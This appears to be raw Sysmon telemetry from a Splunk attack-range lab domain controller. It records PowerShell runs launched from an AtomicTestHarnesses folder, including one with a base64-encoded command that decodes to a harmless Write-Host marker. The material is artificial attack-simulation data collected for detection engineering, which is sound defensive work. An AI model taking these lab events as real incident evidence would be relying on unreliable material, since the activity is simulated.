16:52:19.523{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:19.496{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452\PSHost.132591775394023370.9452.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.465{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_aqe3by1w.wm1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.465{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oct0vnxh.01a.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.449{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oct0vnxh.01a.ps12021-03-02 16:52:19.449 10341000x80000000000000002235126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.434{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.403{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.403{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.403{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.403{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.403{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.403{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.387{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.402{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EC VwByAGkAdABlAC0ASABvAHMAdAAgADUAOAAwADYAZABlAGYAMgAtADcAZQA1ADEALQA0ADIAMQBhAC0AYQBlAGIAMgAtADMAZAAwADgAZgA3AGYAMAA2ADkANgA3AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.059{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61CCEC9DC8EA55B02B4EE35303698A3,SHA256=22BBAD2A371F24485C6BC9C393EFE7D8B22000E492505439CFD4D94A263C8E04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.981{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.981{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:20.965{05ADC7E1-6D44-603E-61AA-00000000AD01}14396\PSHost.132591775408691310.14396.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.934{05ADC7E1-6D44-603E-61AA-00000000AD01}14396ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_o3f2vbnn.ugj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.934{05ADC7E1-6D44-603E-61AA-00000000AD01}14396ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_1zv44b1c.1gn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.923{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_1zv44b1c.1gn.ps12021-03-02 16:52:20.923 10341000x80000000000000002235220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.903{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.871{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.856{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.856{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.856{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.856{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.856{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.856{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)